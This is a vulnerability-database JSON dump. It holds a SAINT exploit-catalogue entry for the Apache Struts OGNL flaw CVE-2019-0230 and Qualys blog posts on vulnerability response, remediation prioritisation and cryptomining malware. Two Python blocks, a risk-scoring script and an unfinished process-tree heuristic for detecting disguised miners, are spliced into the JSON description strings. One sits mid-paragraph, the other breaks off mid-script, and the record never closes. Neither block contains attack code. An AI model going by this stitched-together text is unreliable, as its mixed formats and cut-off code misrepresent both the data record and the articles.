"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "href": 
"https://my.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T16:55:07", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. 
\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:891A42933A0DE986694E3B7D51B3F2F1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:12", "description": "It\u2019s happening more and more. 
\n\n_Gill Langston, a Qualys Director of Product Management, speaks at RSA Conference 2018_\n\nHigh profile vulnerabilities like Meltdown and Spectre are disclosed, and become headline-grabbing news not just in the technology press, but on general news outlets worldwide.\n\nEven if the vulnerabilities aren\u2019t associated with an attack, the news reports rattle C-level executives, who ask the security team for a plan to address the by now notorious bug, and pronto.\n\nOften, a counter-productive disruption of the normal vulnerability and patch management operations ensues, as those involved scramble to draft a response against the clock in a panic atmosphere, punctuated by confusion and finger-pointing.\n\n\u201cShould I just immediately be jumping and reacting? Should I start deploying patches, and then go from there? I\u2019m going to argue that that\u2019s not always the case,\u201d Gill Langston, a Product Management Director at Qualys, said Wednesday during a presentation at RSA Conference 2018.\n\n### The right approach\n\nWhat security teams should aim for is a coherent, appropriate and rational response plan that is grounded in a factual and comprehensive assessment of the situation, said Langston, whose presentation was titled \u201cThe Sky Is Falling! Responding Rationally to Headline Vulnerabilities.\u201d\n\n\u201cHow can I put this together and send something back to the C-level executives that says: \u2018This is my recommendation for now.\u2019 It may not always be to go deploy the patches,\u201d Langston said. \u201cCreate a plan, and then react, review and improve it over time.\u201d\n\nA key step in dealing effectively with this type of \u201cnews event\u201d vulnerabilities is to have a proper and solid vulnerability management and remediation program in place. 
That way, organizations are in a better position to do a precise risk assessment of disclosed bugs on a continuous basis, according to Langston.\n\nThis also means that when a high profile vulnerability is announced, security teams have a head start. That way, they don\u2019t have to go back to square one to ensure they are in fact identifying all assets before they can start to react.\n\nOrganizations will be able to pick the most appropriate course of action, which depending on the case, can be to patch right away, to mitigate when remediation is complex, or to monitor and wait before acting.\n\nBelow are three recent examples of each scenario.\n\n### Patch now, unless you \u201cwanna cry\u201d later\n\nMost organizations should have prioritized patching the vulnerability that was exploited by the WannaCry ransomware, way before the attack was unleashed, according to Langston. Instead, the [WannaCry attack](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) infected 300,000-plus systems and disrupted critical operations globally.\n\nMicrosoft disclosed the Windows vulnerability ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) in mid-March 2017 and made a patch available. At the time, Microsoft rated the vulnerability as \u201cCritical\u201d due to the potential for attackers to execute remote code in affected systems.\n\nThe vulnerability also had a number of other red flags that made it stand out as a particularly concerning one. In mid-April, the vulnerability became even more dangerous when the [Shadow Brokers hacker group](<https://blog.qualys.com/securitylabs/2017/04/15/the-shadow-brokers-release-zero-day-exploit-tools>) released an exploit for it called EternalBlue.\n\nSo organizations had a window of about two months to install the patch before WannaCry was unleashed in mid-May. 
Had most affected systems been patched, WannaCry\u2019s impact would have been minor.\n\n\u201cIn most cases, organizations that follow the standard patching cycle of 30 days, they were already protected. And two months in, you got a second shot at it,\u201d he said.\n\nLangston displayed a graph with Qualys vulnerability scanning data showing that between mid-March and mid-April, detection of affected devices spiked and gradually declined as organizations scanned and patched their systems.\n\n\n\nHowever, the number of vulnerable systems shot up after the EternalBlue release, after organizations apparently expanded the initial scope of scanned IT assets. \n\nAnd there\u2019s an important lesson here. \u201cWhen you\u2019re dealing with a vulnerability that can jump around your network, if you\u2019re not identifying all of the assets, you\u2019re already behind the eight ball,\u201d he said.\n\nThe graph shows that widespread patching didn\u2019t fully kick in until after the WannaCry attacks began.\n\nFrom WannaCry, Langston identified some key no-nos: a slow identification of all at-risk assets; a tendency by IT operations teams to treat all issues with similar urgency; and complacency among end users who delay rebooting their machines to finish the patching process.\n\n### Strut your firewall\n\nLangston then discussed the Struts web application vulnerability that was exploited most famously at Equifax, leading to that consumer credit reporting agency's massive data breach. On the same day that Struts was disclosed, and a patch made available, an exploit was also released, so the risk was high.\n\nBecause web application vulnerabilities tend to be difficult to remediate, often requiring a rebuild and long testing cycles, Struts highlights the importance of mitigation. 
In this case, a good plan would have been to use a [web application firewall](<https://blog.qualys.com/technology/2017/03/09/qualys-waf-2-0-protects-against-critical-apache-struts2-vulnerability-cve-2017-5638?>) while patching was in progress, he said. \n\n### Meltdown and Spectre: All bark and no bite?\n\nThen there are the Spectre and Meltdown vulnerabilities, which caused widespread alarm upon their disclosure in early January of this year, but for which there are only ineffective proof-of-concept exploits so far.\n\nIn the panic that was created, vendors such as Microsoft and Intel released faulty patches that IT departments rushed to apply, only to have to react after they caused system problems, including data corruption and performance issues.\n\nQualys vulnerability scan data for Meltdown shows an initial push to install OS patches, followed by a long plateau of inactivity, as organizations probably weighed the fact that there were no exploits, and that the patches were problematic.\n\nA big lesson from Meltdown and Spectre? \u201cJust because it\u2019s in the news doesn\u2019t mean it\u2019s an emergency,\u201d Langston said. In other words, it\u2019s an example of a scenario where the most prudent thing to do is to monitor the situation and wait, instead of rushing to patch.\n\n### Best practices\n\nLangston recommends these six tips for crafting the best response to a notoriously public vulnerability:\n\n * Identify high-risk vulnerabilities often\n * Track the specific risk to your organization\n * Determine the best course of action\n * Decide when to communicate with internal stakeholders\n * Update regularly\n * Work the plan and improve it\n\nIt\u2019s also key to get buy-in from all the teams that will be involved in drafting, approving and executing the plan, including executives, security operations, DevOps, and IT operations. 
\u201cBuild the playbook together,\u201d he said.\n\nThe response plan should have four main elements:\n\n * Preparation, which involves ensuring that all assets are identified, that the triggers are documented and that the communication outreach is built\n * Reaction, which involves working the playbook, deciding on the course of action (fix, wait or mitigate), and communicating with your users\n * Revision, which involves reviewing the outcomes of the executed plan, and identifying improvement areas\n * Improvement, which involves collaboration to refine the response, modifying the plan based on findings, and extending the plan to all high-severity vulnerabilities\n\nThis should all amount to a rational, measured response, rather than a knee-jerk reaction that leads to erratic, misguided decisions and actions.\n\n\u201cIf you don\u2019t have some response plan, you end up bouncing off of each other, pointing fingers and slowing down the entire process,\u201d he said.\n\nBelow is a checklist template that Langston suggests could be helpful in analyzing how to best respond to a \u201cheadline vulnerability\u201d.\n\nHere\u2019s how that checklist might look when filled out by a hypothetical organization for the Meltdown vulnerability.\n\nThis information can also be enriched and expanded using automated dashboards with threat feeds and other resources that are updated in real time and that allow security teams to do in-depth analysis of relevant data.\n\nThe goal is that in the face of a headline-blaring vulnerability, organizations can come up with a well-thought-out, sensible plan. \u201cA methodical approach leads to a rational response,\u201d Langston said.", "cvss3": {}, "published": "2018-04-19T23:00:03", "type": "qualysblog", "title": "The Sky Is Falling! 
Responding Rationally to Headline Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-04-19T23:00:03", "id": "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "href": "https://blog.qualys.com/news/2018/04/19/the-sky-is-falling-responding-rationally-to-headline-vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T20:50:12", "description": "Here\u2019s a stat that shows the importance of prioritizing vulnerability remediation: Almost 30% of the CVEs disclosed in 2017 had a CVSS score of \u201cHigh\u201d or \u201cCritical.\u201d That works out to about 3,000 such vulnerabilities, or about 58 every week.\n\nGiven this large number of severe vulnerabilities, it\u2019s critical for IT and security teams to make a deeper assessment of the risk they represent in the context of their organizations\u2019 IT environment.\n\nIf they identify the vulnerabilities that pose the highest risk to their organization\u2019s most critical assets, they\u2019ll be able to prioritize remediation accordingly and eliminate the most serious and pressing threats to their IT environment.\n\nHowever, as evidenced by the long list of major breaches caused by unpatched vulnerabilities, it\u2019s hard for many businesses, government agencies and not-for-profit organizations to prioritize remediation consistently and accurately.\n\n\u201cOne of the big challenges that we have as security professionals is trying to stay on top of our vulnerability management,\u201d Josh Zelonis, a Forrester Research analyst, said during a recent [webcast](<https://www.qualys.com/webcasts/prioritization-vulnerabilities-modern-it-environment/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=webcast&leadsource=344565181>).\n\nZelonis, who cited the CVE stat during the webcast, said that, according to a 
2017 Forrester survey of global businesses, 58% of them experienced at least one breach in the previous 12 months. Among those, 41% of the breaches were carried out by exploiting a vulnerability.\n\n\u201cThis is really representative of the problems we\u2019re seeing in the industry with prioritization and getting patches deployed, and this is only increasing,\u201d he said.\n\n\u201cIn a post-Equifax world, VM is coming under increased scrutiny,\u201d Zelonis added, referring to vulnerability management and alluding to the massive data breach suffered by the credit reporting agency in 2017 after hackers exploited the Apache Struts vulnerability (CVE-2017-5638), which had been disclosed and patched in March 2017, roughly two months before the attackers first gained access and six months before Equifax announced the breach in September.\n\nRead on to learn valuable best practices for prioritizing remediation, and how Qualys can help your organization overcome this critical challenge.\n\n### Vulnerability management and prioritization tips\n\nAccording to Zelonis, the vulnerability risk management process has four main steps: \n\n * Asset identification\n * Enumeration of assets\n * Prioritization of patching\n * Remediation\n\nWhen assigning remediation priorities, it\u2019s key to examine the severity of the vulnerabilities in the context of each asset. \n\nFor example, it should be a top priority to remediate a critical vulnerability in an asset that\u2019s highly important. However, remediating that same vulnerability may not be a top priority when it\u2019s present in an asset of medium or low importance. 
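The asset-context rule above is easy to state and easy to get wrong in practice, so here is a small, runnable illustration in Python. It is an added example written for this page, not Qualys or Forrester code: the weights, SLA bands, asset names and the two placeholder vulnerability IDs (VULN-A and VULN-B, which are not real CVEs) are assumptions chosen to make the ranking behaviour visible, while CVE-2017-5638 is the Struts flaw discussed in this post. The score combines CVSS with asset criticality, Internet exposure and threat context (whether the flaw is being exploited, has a public exploit, or has no patch yet), then ranks findings and decides between patching and a compensating mitigation, with an SLA drawn from the 30-day cycle mentioned earlier on this page.

```python
"""Risk-based remediation ranking: added illustrative example, not Qualys code.

Severity is weighted by the importance and exposure of the asset it sits on
and by threat context, so the same CVE ranks differently on different hosts.
All weights, SLA bands and sample data below are assumptions for illustration.
"""
from dataclasses import dataclass
from typing import Dict, List

# Asset importance tier -> weight (assumed values).
CRITICALITY_WEIGHT = {"critical": 1.0, "high": 0.8, "medium": 0.5, "low": 0.3}
# Network exposure -> weight (assumed values).
EXPOSURE_WEIGHT = {"internet": 1.25, "partner": 1.1, "internal": 1.0}
# (minimum score, remediation SLA in days); 30 days is the "standard patching
# cycle" mentioned earlier on this page. Checked top-down, first match wins.
SLA_BANDS = [(12.0, 3), (8.0, 14), (4.0, 30), (0.0, 90)]


@dataclass(frozen=True)
class Asset:
    name: str
    criticality: str  # key of CRITICALITY_WEIGHT
    exposure: str     # key of EXPOSURE_WEIGHT


@dataclass(frozen=True)
class ThreatIntel:
    """Real-time threat indicators for one vulnerability."""
    actively_exploited: bool = False
    public_exploit: bool = False
    patch_available: bool = True


@dataclass(frozen=True)
class Finding:
    asset: str   # Asset.name
    vuln: str    # vulnerability identifier
    cvss: float  # CVSS base score, 0.0-10.0


def threat_multiplier(intel: ThreatIntel) -> float:
    """Active exploitation outweighs a merely public exploit."""
    if intel.actively_exploited:
        return 1.5
    if intel.public_exploit:
        return 1.3
    return 1.0


def risk_score(finding: Finding, asset: Asset, intel: ThreatIntel) -> float:
    score = (finding.cvss
             * CRITICALITY_WEIGHT[asset.criticality]
             * EXPOSURE_WEIGHT[asset.exposure]
             * threat_multiplier(intel))
    return round(score, 2)


def sla_days(score: float) -> int:
    for minimum, days in SLA_BANDS:
        if score >= minimum:
            return days
    return SLA_BANDS[-1][1]


def recommended_action(intel: ThreatIntel) -> str:
    # No patch yet: the decision is "mitigate" (WAF rule, isolation, ...),
    # the fix/wait/mitigate choice the response playbook earlier on this page describes.
    return "patch" if intel.patch_available else "mitigate"


def prioritize(findings: List[Finding], assets: Dict[str, Asset],
               intel_by_vuln: Dict[str, ThreatIntel]) -> List[dict]:
    """Return findings ranked by contextual risk, highest first."""
    rows = []
    for f in findings:
        asset = assets[f.asset]
        intel = intel_by_vuln.get(f.vuln, ThreatIntel())
        score = risk_score(f, asset, intel)
        rows.append({"asset": f.asset, "vuln": f.vuln, "cvss": f.cvss,
                     "score": score, "action": recommended_action(intel),
                     "sla_days": sla_days(score)})
    rows.sort(key=lambda r: (-r["score"], r["asset"], r["vuln"]))
    for rank, row in enumerate(rows, start=1):
        row["rank"] = rank
    return rows


# Constructed sample inventory. CVE-2017-5638 is the Struts flaw discussed
# on this page; VULN-A and VULN-B are placeholders, not real CVE identifiers.
SAMPLE_ASSETS = {a.name: a for a in (
    Asset("web-portal-01", "critical", "internet"),
    Asset("hr-db-02", "high", "internal"),
    Asset("build-agent-07", "low", "internal"),
)}
SAMPLE_INTEL = {
    "CVE-2017-5638": ThreatIntel(actively_exploited=True, public_exploit=True),
    "VULN-B": ThreatIntel(actively_exploited=True, patch_available=False),
}
SAMPLE_FINDINGS = [
    Finding("web-portal-01", "CVE-2017-5638", 10.0),
    Finding("build-agent-07", "CVE-2017-5638", 10.0),
    Finding("hr-db-02", "VULN-A", 7.5),
    Finding("web-portal-01", "VULN-B", 6.5),
]

if __name__ == "__main__":
    for row in prioritize(SAMPLE_FINDINGS, SAMPLE_ASSETS, SAMPLE_INTEL):
        print("{rank}. {asset:15} {vuln:15} cvss={cvss:4} risk={score:6} "
              "{action} within {sla_days}d".format(**row))
```

Running it shows the point of the paragraph above: the CVSS 10.0 Struts flaw lands at the top on the Internet-facing portal (18.75, patch within 3 days) but at the bottom on the low-value build agent (4.5, 30 days), below a CVSS 7.5 issue on the HR database (6.0). An unpatched, actively exploited 6.5 on the portal scores 12.19 and is routed to "mitigate" rather than "patch", which is the decision a WAF rule or isolation would cover while a fix is pending.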
\n\nIn vulnerability management, it\u2019s also helpful to use threat intelligence not just to detect threats but also to patch preemptively, using threat landscape trends as a guide.\n\n\u201cIt\u2019s important to understand how a vulnerability can be exploited so you can take a look at the assets within your organization to figure out where patches need to be prioritized and applied,\u201d Zelonis said.\n\nThreat intelligence is also essential for security teams to be able to communicate effectively with C-level executives and board members, who are increasingly interested in staying informed about the organization\u2019s security posture and strategy.\n\n\u201cOnce you\u2019ve made it relevant to them, they\u2019re going to need to understand what you\u2019re doing to mitigate the situations and perhaps allocate additional budget where necessary,\u201d he said.\n\nIt\u2019s also important to communicate this information not just to the higher-ups, but also horizontally across other IT teams such as operations, and across business units, because vulnerability remediation requires cross-functional collaboration.\n\n\u201cThis is a major gap we see with organizations who are struggling to get items patched: The security team\u2019s priorities aren\u2019t echoed nor understood outside of the security team,\u201d he said.\n\nThe goal here is to make these other teams aware of the real risk and potential business impact of particular vulnerabilities.\n\nUltimately, organizations should evolve from vulnerability management to vulnerability risk management. 
That way, the focus isn\u2019t just on reducing false positives, but rather on assessing critical data points and metrics to attain an understanding of risk, according to Zelonis.\n\n### Qualys: Asset visibility, vulnerability management and threat prioritization\n\nWith Qualys, you\u2019ll get complete visibility of your IT assets wherever they reside -- on premises, in clouds or at remote endpoints -- and you\u2019ll be able to continuously detect and assess all your vulnerabilities, and precisely prioritize remediation.\n\nWith proper vulnerability management, you \u201cimmunize\u201d your IT assets against opportunistic attacks which are designed to exploit common, well-known bugs and which are the most likely to hit your network.\n\nLet\u2019s look at three Qualys products that work in tandem to provide you with this asset visibility, vulnerability detection and remediation prioritization.\n\n_Qualys AssetView_\n\n[Qualys AssetView](<https://www.qualys.com/apps/asset-inventory/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) automates collection and categorization of IT and security information, and provides a unified view of this data.\n\n\u201cIt brings IT and security data together,\u201d Qualys Product Management Director Jimmy Graham said during the webcast, titled \u201cPrioritization of Vulnerabilities in a Modern IT Environment.\u201d\n\nThe data, which is fed into the Qualys Cloud Platform for aggregation, indexing, correlation, and analysis, is continuously collected and updated using a variety of sensors, including:\n\n * Physical and virtual appliances that scan IT assets located on-premises, in private clouds, or in virtualized environments\n * Cloud appliances that remotely scan your infrastructure-as-a-service (IaaS) and platform-as-a-service (PaaS) instances in commercial cloud computing platforms\n * Lightweight, all-purpose cloud 
agents installed on IT assets that continuously monitor them\n\nThe data is made searchable via AssetView\u2019s search engine using ad-hoc queries. In addition, any query can be turned into interactive, continuously updated widgets in AssetView\u2019s customizable and dynamic dashboards. You can also generate detailed and custom-tailored reports.\n\nThis inventory provides both a complete \u201chorizontal\u201d list of IT assets as well as deep \u201cvertical\u201d details for each asset, including hardware specs, installed software, network connections, approved users, applied patches, and open vulnerabilities. \n\nIn addition, Qualys AssetView lets you assign criticality rankings to assets, since not all assets carry the same weight within your organization. Qualys lets you [tag your assets](<https://blog.qualys.com/news/2017/02/28/making-asset-inventory-actionable-with-a-cloud-based-system>), so you can attach relevant labels to them in the inventory and organize them in multiple ways.\n\n_Qualys Vulnerability Management_\n\n[Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) provides continuous, comprehensive coverage and visibility, as well as constant monitoring and alerts, in a way that makes vulnerability assessment effective in a \u201cperimeter-less world,\u201d according to Graham.\n\n\u201cWe call that \u2018perimeter-less world\u2019 because we collect vulnerabilities from on premises devices, and from private and public clouds. Through the agent, we can collect vulnerability information from roaming devices like laptops that employees may be using in a coffee shop or at home,\u201d he said.\n\nQualys VM maps all assets on the network, detailing their OS, ports, services and certificates, and scans them for vulnerabilities with Six Sigma 99.99966 percent accuracy. 
It assigns remediation tickets, manages exceptions, lists patches for each host, and integrates with existing IT ticketing systems.\n\nIn addition, VM generates comprehensive reports customized for different recipients \u2014 like IT pros, business executives or auditors \u2014 and incorporates context and insight, including progress against goals. Via VM\u2019s APIs, the reporting data can be integrated with other security and compliance systems.\n\nWhen VM is paired with the Qualys Continuous Monitoring (CM) app, you\u2019ll be alerted about potential threats \u2014 such as new hosts/OSes, expiring certificates, unexpected open ports and unauthorized software \u2014 so problems can be tackled before turning into breaches. \n\n_Qualys Threat Protection_\n\nTo prioritize remediation work, you must continuously correlate vulnerability disclosures with your organization\u2019s IT asset inventory, so that you get a clear picture of the vulnerabilities that exist in each IT asset.\n\nThis is what [Qualys Threat Protection (TP)](<https://www.qualys.com/apps/threat-protection/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) does, and more.\n\n\n\nQualys TP continuously correlates external real-time threat indicators (RTIs) against your internal vulnerabilities and IT asset data, so you can take full control of evolving threats and identify what to remediate first.\n\n\u201cWhat ties this all together is Qualys Threat Protection,\u201d Graham said.\n\nRTIs add valuable context to a vulnerability, such as whether: \n\n * It\u2019s being actively attacked in the wild\n * There\u2019s an exploit kit available for it\n * It can lead to high data loss or to a denial of service attack\n * It\u2019s a \u201czero day\u201d with no patch available\n\nRegarding IT assets, you should consider factors such as their role in business operations, their interconnectedness with 
other assets, their Internet exposure and their user base.\n\nOut of this type of in-depth analysis will emerge a clear picture of your threat landscape, and based on it, you\u2019ll be able to come up with an accurate remediation plan.\n\nQualys TP features include:\n\n * Robust Data Analysis\n\nQualys TP continuously correlates external threat information against your vulnerabilities and IT asset inventory, leveraging Qualys Cloud Platform\u2019s robust back-end engine to automate this large-scale and intensive data analysis process. \n\n * Live Threat Intelligence Feed\n\nAs Qualys engineers continuously validate and rate new threats from internal and external sources, Qualys TP\u2019s Live Threat Intelligence Feed displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details.\n\nQualys Threat Protection, working in tandem with [Qualys AssetView](<https://www.qualys.com/apps/asset-inventory/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) and [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>), helps you to proactively and continuously detect assets and vulnerabilities, and prioritize remediation in your IT environment.\n\n_Watch a recording of the [webcast](<https://www.qualys.com/webcasts/prioritization-vulnerabilities-modern-it-environment/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=webcast&leadsource=344565181>), which has a lot more details, a demo of Qualys Threat Protection, and a Q&A session with the audience._", "cvss3": {}, "published": "2018-05-07T16:00:10", 
"type": "qualysblog", "title": "How To Prioritize Vulnerabilities in a Modern IT Environment", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-05-07T16:00:10", "id": "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "href": "https://blog.qualys.com/news/2018/05/07/how-to-prioritize-vulnerabilities-in-a-modern-it-environment", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T20:50:13", "description": "In this week\u2019s InfoSec news review we\u2019ll dive into cryptomining, get the latest on DDoS amplification, go over recent data breaches, and check out another vendor claiming it can crack iPhones.\n\n### I, me, mine\n\nThe freight train that\u2019s cryptomining shows no sign of slowing down, and the cyber security implications are intensifying accordingly.\n\nThis week alone, Microsoft [detected and disrupted](<http://www.newsweek.com/crypto-mining-malware-outbreak-infected-500000-computers-single-day-836145>) a massive cryptomining malware campaign, a Tesla AWS account [got hijacked](<http://fortune.com/2018/02/20/tesla-hack-amazon-cloud-cryptocurrency-mining/>), a new mining worm [was discovered](<https://securityboulevard.com/2018/03/worm-infects-redis-and-windows-servers-with-cryptomining-malware/>), and Kaspersky researchers warned about increased [sophistication of infection methods](<https://www.businesswire.com/news/home/20180305005866/en/Million-Kaspersky-Lab-Identifies-Sophisticated-Hacker-Groups>). \n\nWhile there is a legitimate component to this business, malicious hackers eager to profit are aggressively breaching networks and infecting devices -- PCs, IoT systems, smartphones, servers -- to steal computing power for mining virtual currencies.\n\n_A cryptocurrency mining farm in Iceland. 
(Photo credit: By [Marco Krohn - Own work, CC BY-SA 4.0](<https://commons.wikimedia.org/w/index.php?curid=40495567>))_\n\nThe creation and verification process of virtual currencies like Bitcoin and Monero involves solving lengthy and complex mathematical calculations that require large amounts of [computing power](<https://www.coindesk.com/nvidia-cfo-crypto-mining-demand-beat-expectations-q4/>). Those involved in this [\u201cblockchain\u201d process](<https://www.investopedia.com/tech/how-does-bitcoin-mining-work/>) earn money from it, and the payouts have skyrocketed as the value of these cryptocurrencies has dramatically increased in the past several months.\n\nThat has attracted the attention both of legitimate players -- [individuals](<http://www.businessinsider.com/mining-cryptocurrency-making-a-profit-2018-2>) and [businesses](<https://www.theverge.com/2018/2/13/17008158/salon-suppress-ads-cryptocurrency-mining-coinhive-monero-beta-testing>) -- and, unfortunately, of bad actors, who are using malware to gain unauthorized access to systems they then leverage for mining.\n\n\u201cExploit kits are now delivering coin miners instead of ransomware. Scammers are adding coin mining scripts in tech support scam websites. And certain banking trojan families added coin mining behavior,\u201d Microsoft\u2019s Windows Defender team stated in its [blog post](<https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/>).\n\nBetween September and January, the number of websites hosting cryptomining scripts [spiked 725%](<https://www.cyren.com/blog/articles/increase-in-cryptocurrency-mining-threatens-more-than-just-your-cpu>), Cyren Security Lab said recently. 
That figure includes domains that are hosting these scripts knowingly, as well as those that have been breached.\n\nCryptomining attacks are purposefully stealthy and silent: They avoid noticeably disrupting breached systems\u2019 operations in order to remain undetected. \u201cFor coin miner malware, persistence is key. These types of malware employ various techniques to stay undetected for long periods of time in order to mine coins using stolen computer resources,\u201d reads Microsoft\u2019s blog post.\n\nThus, cryptomining gives hackers \u201call of the financial upside\u201d of ransomware and other attacks without having to engage the victim and while drawing less law enforcement attention, Cisco\u2019s Talos unit [explained](<http://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>) in late January.\n\nAs industry analyst Jason Bloomberg put it in a [Forbes column](<https://www.forbes.com/sites/jasonbloomberg/2018/03/04/top-cyberthreat-of-2018-illicit-cryptomining/#4b6bdcc05ae8>) recently, \u201cransomware is oh, so 2017,\u201d as \u201csmart hackers have turned to illicit cryptomining to fill their coffers\u201d lured by a perfect storm of \u201ceasy money, slim chance of detection, and billions of unsuspecting targets that may not even care they\u2019ve been hacked.\u201d\n\nLast month, Imperva [reported](<https://www.imperva.com/blog/2018/02/new-research-crypto-mining-drives-almost-90-remote-code-execution-attacks/>) that cryptomining now drives almost 90% of all remote code execution attacks. Kaspersky Lab put the number of users attacked by malicious miners[ at 2.7 million in 2017](<https://securelist.com/mining-is-the-new-black/84232/>), up 50% from 2016. And according to Check Point, [23% of global organizations](<https://coinjournal.net/23-organizations-globally-affected-crypto-mining-malware-coinhive-says-cybersecurity-firm/>) were affected in January by the Coinhive crypto-mining malware. 
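Miners are stealthy on the wire but noisy in the process tree, and the Dofoil chain described further down in this post (a hollowed explorer.exe that spawns a second explorer.exe, which drops a miner posing as wuauclt.exe) is a good case to work through. The Python below is an added example for this page, not Microsoft's or Qualys's detection logic. The events are constructed Sysmon-style process-creation records; the rules assume %SystemRoot% is C:\Windows, that a legitimate Windows Update client lives in System32 (or SysWOW64 on 64-bit hosts) and is started by svchost.exe, and that the interactive shell is launched once by userinit.exe. Hollowing itself replaces the image in memory after the process exists, so creation-time logging cannot see it; these rules catch the surrounding tree, not the injected code.

```python
"""Process-tree heuristics for a Dofoil-style miner chain.

Added illustrative example; not Microsoft's or Qualys's detection logic.
Input is constructed Sysmon-style process-creation data. Assumptions:
%SystemRoot% is C:\\Windows, a legitimate Windows Update client lives in
System32 (or SysWOW64 on 64-bit hosts) and is started by svchost.exe.
"""
import json
import ntpath
from typing import Dict, List

# Constructed sample events (one JSON object per line). A raw string keeps the
# doubled backslashes that JSON needs for Windows paths.
SAMPLE_EVENTS = r"""
{"utc": "2018-03-07T10:01:02Z", "pid": 4120, "ppid": 812, "image": "C:\\Windows\\explorer.exe", "parent_image": "C:\\Windows\\System32\\userinit.exe"}
{"utc": "2018-03-07T10:03:10Z", "pid": 5208, "ppid": 4120, "image": "C:\\Windows\\SysWOW64\\explorer.exe", "parent_image": "C:\\Windows\\explorer.exe"}
{"utc": "2018-03-07T10:03:11Z", "pid": 5344, "ppid": 5208, "image": "C:\\Windows\\SysWOW64\\explorer.exe", "parent_image": "C:\\Windows\\SysWOW64\\explorer.exe"}
{"utc": "2018-03-07T10:03:12Z", "pid": 5400, "ppid": 5344, "image": "C:\\Users\\alice\\AppData\\Roaming\\wuauclt.exe", "parent_image": "C:\\Windows\\SysWOW64\\explorer.exe"}
{"utc": "2018-03-07T10:05:00Z", "pid": 6012, "ppid": 1004, "image": "C:\\Windows\\System32\\wuauclt.exe", "parent_image": "C:\\Windows\\System32\\svchost.exe"}
"""

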